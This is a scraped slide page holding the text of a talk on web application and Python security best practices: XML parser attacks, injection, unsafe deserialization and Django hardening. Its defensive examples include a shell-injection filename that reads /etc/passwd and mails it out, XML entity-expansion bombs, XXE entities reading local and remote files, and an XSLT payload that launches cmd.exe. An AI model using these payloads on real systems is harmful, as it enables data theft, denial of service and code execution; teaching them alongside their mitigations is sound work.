While the importance of sharing cyber threat intelligence (CTI) and considering countermeasures in advance as cyber attacks become more sophisticated is increasing, IP addresses and domains as detection indices included in CTI are attacked by attackers in short cycles Dispose (change or disappear). As a countermeasure on the defender side, we are moving towards increasing the cost of attackers by improving the sharing speed of CTI, and we receive large amounts of CTI every day. As a result, the situation is such that the CTI is also disposable in a short cycle. In this report, we built a detection index learning method based on CTI that is accumulated day by day and implemented a detection index learning engine learning how detection indices are used by attackers Report on the learning result. We also report on the possibility of reconstructing and combining the result of learning the detection index and applying it to mid- to long-term advanced protection in combination with another data source.
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
The document provides security tips and best practices for building web applications in Go. It discusses Go's type system, concurrency model, and standard library features. It also summarizes common vulnerabilities like SQL injection and XSS, and recommends using parameterized queries and HTML escaping to prevent them. Finally, it highlights tools like Gorilla and Gin web frameworks, and techniques like rate limiting and secure cookies to build secure Go applications.
This document discusses container security and analyzes potential vulnerabilities in Docker containers. It describes how containers may not fully isolate processes and how an attacker could escape a container to access the host machine via avenues like privileged containers, kernel exploits, or Docker socket access. It provides examples of container breakouts using these methods and emphasizes the importance of security features like seccomp, AppArmor, cgroups to restrict containers. The document encourages readers to apply security best practices like the Docker Bench tool to harden containers.
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
This document discusses different tools that can be used to generate random test data and load test applications, including Tsung, ScalaCheck, and Gatling. It provides an overview of how each tool works and how they can be combined. Tsung is an open source load testing tool that can simulate users and load test applications. ScalaCheck is a property-based testing library that can generate random test data. Gatling is an open source load testing framework that supports load testing applications using scenarios and simulated users. It discusses how ScalaCheck can be used to generate random test data and how that data can be fed into Gatling load tests using feeders.
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...idsecconf
Adversary Simulation pada lingkungan cloud memiliki karakteristik unik sehingga memerlukan pendekatan khusus. Stratus menawarkan fleksibilitas dalam melakukan simulasi attack secara native pada lingkungan cloud. Presentasi ini akan memberikan penjelasan tentang penggunaan Stratus dalam adversary simulation dan bagaimana mengembangkan skenario khusus sesuai kebutuhan.
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The document discusses weaknesses in random number generation and pseudorandom number generation (PRNG) that can be exploited by attackers. It provides examples of programs that used weak PRNGs, allowing session IDs and keys to be guessed. Lessons learned are that numbers used to derive keys and IDs must be truly random and unpredictable, and PRNGs must be cryptographically secure. Two types of randomness are defined: true randomness from unpredictable sources, and pseudorandomness from cryptographically secure PRNGs seeded with true randomness.
PyCon AU 2012 - Debugging Live Python Web ApplicationsGraham Dumpleton
Monitoring tools record the result of what happened to your web application when a problem arises, but for some classes of problems, monitoring systems are only a starting point. Sometimes it is necessary to take more intrusive steps to plan for the unexpected by embedding mechanisms that will allow you to interact with a live deployed web application and extract even more detailed information.
This document provides guidance on sharing reproducible R code projects using version control with Git and GitHub. It discusses configuring Git and RStudio to work together, organizing R projects, publishing projects on GitHub, and tips for making code more shareable. Version control with Git allows tracking changes, collaboration, and recovering from issues like computer crashes. Following standards for coding style, documentation, and packaging environments helps ensure projects are reproducible.
This document discusses hacking serverless runtime environments like AWS Lambda, Azure Functions, and Auth0 WebTask. It begins by introducing the presenters and what will be covered. The document then explores how different vendors implement sandbox isolation and common attack techniques like persistence and data exfiltration. It examines specific runtimes like AWS Lambda in depth, investigating how to profile the environment, persist code, and escalate privileges. The document emphasizes that detection is difficult in serverless environments and provides examples of potential indicators of compromise. Overall, the document provides an overview of attacking and defending serverless architectures.
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
Slides from "Web Applications Automated Security Testing in a Continuous Delivery Pipeline" workshop, made during Drupal Developers Days 2017 at Seville, Spain
The document discusses OWASP Zed Attack Proxy (ZAP), a free and open source web application security scanner. It can be used by pentesters, developers, and testers to detect vulnerabilities. ZAP passively and actively scans applications to find issues. It can be integrated into CI/CD pipelines and automated with APIs, command line tools, and programming libraries. The document provides examples of using ZAP to perform passive scanning, active scanning, and automation for testers.
Talk from Embedded Linux Conference, http://elcabs2015.sched.org/event/551ba3cdefe2d37c478810ef47d4ca4c?iframe=no&w=i:0;&sidebar=yes&bg=no#.VRUCknSQQQs
Unmasking Careto through Memory Forensics (video in description)Andrew Case
My presentation from SecTor 2014 on analyzing the sophisticated Careto malware with memory forensics & Volatility
Video here: http://2014.video.sector.ca/video/110388398
Kommons is a collection of reusable Java classes for J2ME applications. It includes classes for logging, working with ISO date/time formats, HTTP networking, Bluetooth communication, caching objects to RMS, and more. The goals of Kommons are to provide classes that are stable, easy to use, well tested, and open source. Future work includes improving documentation, testing, and integrating other useful projects.
Node is used to build a reverse proxy to provide secure access to internal web resources and sites for mobile clients within a large enterprise. Performance testing shows the proxy can handle over 1000 requests per second with latency under 1 second. Code quality analysis tools like Plato and testing frameworks like Jest are useful for maintaining high quality code. Scalability is achieved through auto-scaling virtual machine instances with a load balancer and configuration management.
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclientAngelo Dell'Aera
This document summarizes Thug, a low-interaction honeyclient for analyzing client-side attacks. It discusses how Thug emulates browser behavior and plugins to appear as a real browser. Thug uses the V8 JavaScript engine and supports logging and analyzing events using various formats. The document outlines Thug's DOM emulation, event handling, browser personalities, vulnerabilities modules and classifiers for detecting exploit kits.
Waf.js: How to Protect Web Applications using JavaScriptDenis Kolegov
The document discusses techniques for protecting web applications from client-side attacks using JavaScript (Waf.js). It covers the following key points in 3 sentences:
Waf.js provides defenses like CSRF prevention, DOM-based XSS prevention, and detection of unwanted applications. It utilizes parsers like Acorn and DOMPurify to parse and sanitize inputs to prevent injections. The document outlines approaches used by Waf.js to build the AST of an input and search for dangerous code like function calls to prevent attacks while minimizing false positives.
A talk presented at the Automotive Grade Linux All-Members meeting on September 8, 2015. The focus on why AGL should adopt systemd, and highlights two of the more difficult integration issues that may arise while doing so. The embedded SVG image, courtesy Marko Hoyer of ADIT, is at http://she-devel.com/2015-07-23_amm_demo.svg
Similar to Web application security and Python security best practices (20)
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
“An Outlook of the Ongoing and Future Relationship between Blockchain Technologies and Process-aware Information Systems.” Invited talk at the joint workshop on Blockchain for Information Systems (BC4IS) and Blockchain for Trusted Data Sharing (B4TDS), co-located with with the 36th International Conference on Advanced Information Systems Engineering (CAiSE), 3 June 2024, Limassol, Cyprus.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
6. Made with by PGS Software · 6
Few words on start
●
30 bugs per 100 lines - ticket machine printed ticket for
638 zł for 2 zl, Mars (Metric units)
●
Hacker - was good programmer, now it’s student from
HighSchool
●
Attackers: competition, own employee, casual internet
surfer, government
●
Aim of attacker: hack website, stealing information,
injecting malicious software, man, algorithm, metadata
in the word documents
●
Tools - www.shodan.io and many other...
7. Made with by PGS Software · 7
Input injection
import subprocess
def compress_file(request, filename):
command = 'tar cfvz output_file.rar.gz
"{source}"'.format(source=filename)
subprocess.call(command, shell=True)
"|| cat /etc/passwd | mail them@domain.com
Piece of bad code
Code that compresses with given file
name
Exploit
Command in file name
8. Made with by PGS Software · 8
Input injection - solution
●
Never trust user and unknown source
●
use shelx library for shell operations
●
Use shelx.quote to add quotes and prevent execution
9. Made with by PGS Software · 9
Parsing XML – issues
●
Bypass firewall and gain access to the restricted
resources
●
Abuse a service to attack, spy on, DoS servers or third
party services
●
Exhaust additional resources on the machine (e.g.
service that doesn’t responds or responds with big file)
●
Gain knowledge, when, how often and from which IP
address document is accessed
●
Send email from inside network if URL handler supports
smpt URIs
10. Made with by PGS Software · 10
Parsing XML – Billion laughs/exponential
entity expansion
<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>
Exploit
XML entity recursion
11. Made with by PGS Software · 11
Parsing XML – quadratic blow entity
expansion
<!DOCTYPE bomb [
<!ENTITY a "xxxxxxx... a couple of ten thousand
chars">
]>
<bomb>&a;&a;&a;... repeat</bomb>
Exploit
Many Big entity repeated
12. Made with by PGS Software · 12
Parsing XML – external entity expansion
(remote/local)
<!DOCTYPE external [
<!ENTITY ee SYSTEM
"http://www.python.org/some.xml">
]>
<root>ⅇ</root>
<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>ⅇ</root>
Exploit
Load entity from storage or server
13. Made with by PGS Software · 13
Parsing XML – DTD retrival
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd">
<html>
<head/>
<body>text</body>
</html>
Exploit
Reference to document definition
14. Made with by PGS Software · 14
Parsing XML – issues
●
XML parsers may use O(n^2) algorithm to handle
attributes and namespaces.
●
Parsers which uses hash tables for storing attributes
and namespaces – implementation may be vulnerable
to hash collision attacks and performance can go to
O(n^2) again.
15. Made with by PGS Software · 15
Parsing XML – decompression bomb
●
XML libraries can parse compressed XML stream like
HTTP streams or LMZA-ed files.
●
Gzip can compress 1GiB zeros to 1MB and LZMA can be
even better
●
Only Xmlrpclib can decompress steams so it is
vulnerable
●
Lxml can load and process compressed data. It can
handle very large blobs of compressed data without
using too much memory. It is not protected from
decompression bombs.
●
SAX library is the most safe
16. Made with by PGS Software · 16
Parsing XML – processing instruction
<?xml-stylesheet type="text/xsl" href="style.xsl"?> Exploit
Processing instruction
17. Made with by PGS Software · 17
Parsing XML – Xpath injection
●
Work the same as SQL injections
●
Xpath queries must be quoted and validated (especially
when taken from user)
●
Python’s standard library doesn’t have Xpath queries
and have proper quoting. Use xpath() method correctly:
tree.xpath("/tag[@id='%s']" % value) – BAD
tree.xpath("/tag[@id=$tagid]", tagid=name) - GOOD
18. Made with by PGS Software · 18
Parsing XML - XInclude
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="filename.txt" parse="text" />
</root>
We should not do that when we use files from untrusted
sources.
Libxml2 supports Xinclude but do not have option to
limit access only to allowed directories
19. Made with by PGS Software · 19
Parsing XML – XML Schema location
<ead xmlns="urn:isbn:1-931666-22-9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-
instance"
xsi:schemaLocation="urn:isbn:1-931666-22-9 http://
www.loc.gov/ead/ead.xsd">
</ead>
Exploit
XML schema location
20. Made with by PGS Software · 20
Parsing XML – XSL
XSLT is a language for transforming XML documents into
other XML or HTML documents
XSLT processors can interact with external resources like:
read/write to file system, access to JRE objects, scripting
with Jython.
21. Made with by PGS Software · 21
Parsing XML – XSL Transformation
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/
Transform"
xmlns:rt="http://xml.apache.org/xalan/java/
java.lang.Runtime"
xmlns:ob="http://xml.apache.org/xalan/java/
java.lang.Object"
exclude-result-prefixes= "rt ob">
<xsl:template match="/">
<xsl:variable name="runtimeObject"
select="rt:getRuntime()"/>
<xsl:variable name="command"
select="rt:exec($runtimeObject, 'c:
Windowssystem32cmd.exe')"/>
<xsl:variable name="commandAsString"
select="ob:toString($command)"/>
<xsl:value-of select="$commandAsString"/>
</xsl:template>
</xsl:stylesheet>
Exploit
XSL which runs cmd
22. Made with by PGS Software · 22
Parsing XML - Summary
1.Lxml is protected against billion laughs attacks. No
network lookups.
2.libxml2 and lxml are not directly vulnerable to gzip
decompression bombs. No explicit protection to them.
3.xml.etree doesn’t expand entities. Raises a ParserError
when an entity appears.
4.minidom doesn’t expand entities and simply returns
the notification that cannot expand Entity.
23. Made with by PGS Software · 23
Parsing XML - Summary
5.genshi.input from genshi 0.6 doesn’t support entity
expansion. It raises a ParserError when an entity
appears.
6.Library has XInclude support – remember to set a limit
7.Features but they may be exploitable holes
25. Made with by PGS Software · 25
Parsing XML
kind sax etree minidom pulldom xmlprc lxml genshi
gzip bomb Safe Safe Safe Safe Vulnerable Partly (2) Safe
Xpath
support(7)
Safe Safe Safe Safe Safe Vulnerable Safe
xsl(t)
support (7)
Safe Safe Safe Safe Safe Vulnerable Safe
Xinclude
support (7)
Safe Vulnerable
(6)
Safe Safe Safe Vulnerable
(6)
Vulnerable
26. Made with by PGS Software · 26
Parsing XML – what we can do?
Use defusedxml library which is secure:
>>> from xml.etree.ElementTree import parse – BAD !
>>> et = parse(xmlfile)
>>> from defusedxml.ElementTree import parse – GOOD !
>>> et = parse(xmlfile)
All functions and parsers classes accepts additional
arguments and returns original objects
27. Made with by PGS Software · 27
Assert statements
●
Never use assert statements to protect piece of code
from execution
●
Python runs with __debug__ as True. In production it
is common to run application with optimizations
and this option causes skipping assert
statements!
●
Use asserts only in tests
28. Made with by PGS Software · 28
Timing attacks
●
Attack is aimed to algorithm which is comparing
provided values.
●
E.g. in command line application which prompts for the
password
●
We can prevent this attack by using:
secrets.compare_digest (Python 3.5)
29. Made with by PGS Software · 29
Installing 3rd
party packages
●
It is not recommended to use 3rd
party packages in
global site-packages
●
Sometimes on PyPi for popular packages appears
malicious package with very similar name but with
different code.
●
It is important to remember about dependencies of
dependencies. They can contain vulnerabilities which
can change behavior of Python via import system
30. Made with by PGS Software · 30
Temporary files
●
Generally, creating temporary files can be
accomplished by mktemp() function
●
It is not secure because different file system can create
file with this name. In the end application can be fed
with different configuration data.
●
Use tempfile module and use mkstemp() function which
can handle those case.
31. Made with by PGS Software · 31
Using yaml.load
●
Yaml documentation underline that is not safe to call
yaml.load on any data received from untrusted source.
-
https://www.talosintelligence.com/reports/TALOS-2017-0
305
●
Insteaduse yaml.safe_load
32. Made with by PGS Software · 32
Pickles
●
Pickle.load not good the same as yaml.load.
●
Never load pickle from untrusted source
●
Better to use different serialization pattern like JSON
33. Made with by PGS Software · 33
Not patching system Python runtime
●
Python interpreter is written in C
●
Common security issues in C for Python are related to
the allocation of memory, so buffer overflows can
appear. -
https://www.cvedetails.com/cve/CVE-2017-1000158/
●
Install the latest version of Python for production
environment and always patch it
34. Made with by PGS Software · 34
Not patching dependencies
●
It is very important dependencies and its dependencies
- which can be hard because of dependency hell but it is
not excuse!
●
You can use service like PyUp.io to check for updates
●
It is wise to validate all your library versions -
https://www.inspec.io/docs/reference/resources/pip/
●
All above issues can be found by bandit -
https://github.com/PyCQA/bandit
35. Made with by PGS Software · 35
Django security features
●
XSS Protection – jsfuck.com, white list , black list
●
CSRF Protection (is checking referer header, generates
token for form)
●
Injection Protection
●
Clickjacking Protection – SAME ORIGIN, DENY, Support :
IE 8+, FF 3.6.9+, Opera 10.5+, Safari 4+, Chrome 4.1+
●
SSL/HTTPS – SESSION_COOKIE_SECURE=TRUE,
CSRF_COOKIE_SECURE=True, django-sslify, django-
secure
36. Made with by PGS Software · 36
Django security features
●
Password Storage, bcrypt!
●
Data Validation
●
O’Auth2 with django-rest-framework -
https://django-oauth-toolkit.readthedocs.io/en/latest/res
t-framework/getting_started.html
37. Made with by PGS Software · 37
Django practices
●
Always deploy you Django project behind https.
●
Change default url to admin
●
For the admin url use django-admin-honeypot -
https://github.com/dmpayton/django-admin-honeypot
●
Require stronger password –
https://github.com/Pawamoy/django-zxcvbn-password
●
Use at least two factor authentication. Token is most
recommended.
38. Made with by PGS Software · 38
Django practices
●
Use the latest version of Django
●
Never run debug in production – transparent errors,
cached sql queries
●
Check for errors: python manage.py check –deploy
●
You can also check security of your website on
https://www.ponycheckup.com/
39. Made with by PGS Software · 39
Django practices
●
Distinguish environments
●
Deploy admin inside VPN
●
Remove unnecessary components from the main site
●
Define allowed hosts
●
Protect your secret key
40. Made with by PGS Software · 40
Other best practices
●
Harden your servers
●
Never store credit card data
●
Server monitoring
●
Vulnerability reporting page
●
KEEP THINGS UP TO DATE
41. Made with by PGS Software · 41
Other best practices
●
Secured not only on the client's side
●
Buffer overflow is not in java, but can transfer data to
the program in a different language where problem can
appear.
42. Made with by PGS Software · 42
OWASP TOP 10
●
Injection
●
Broken Authentication
●
Sensitive Data Exposure
●
XML External Entities
●
Broken Access Control
●
Security Misconfiguration
●
Cross-Site Scripting
●
Insecure Deserialization
●
Using components with known Vulnerabilitiees
●
Insufficient Logging&Monitoring
43. Made with by PGS Software · 43
Interesting topics
●
https://www.vulnhub.com/entry/lab26-11,190/#downloa
d
- website with images where you can exploit backdoors
●
https://django-oauth-toolkit.readthedocs.io/en/latest/res
t-framework/getting_started.html
- O’Auth with django-rest-framework
●
https://github.com/Phype/telnet-iot-honeypot - telnet
honeypot
44. Made with by PGS Software · 44
Interesting topics
●
https://medium.com/@mccode/processes-in-containers-
should-not-run-as-root-2feae3f0df3b
- docker containers – issues related to docker images
●
https://github.com/TheSecondSun/Safari-Crash - How to
crash safari with HTML exploits (DoS)
●
https://stackoverflow.com/questions/9580575/how-to-m
anually-set-referer-header-in-javascript
- How to change referer header with JS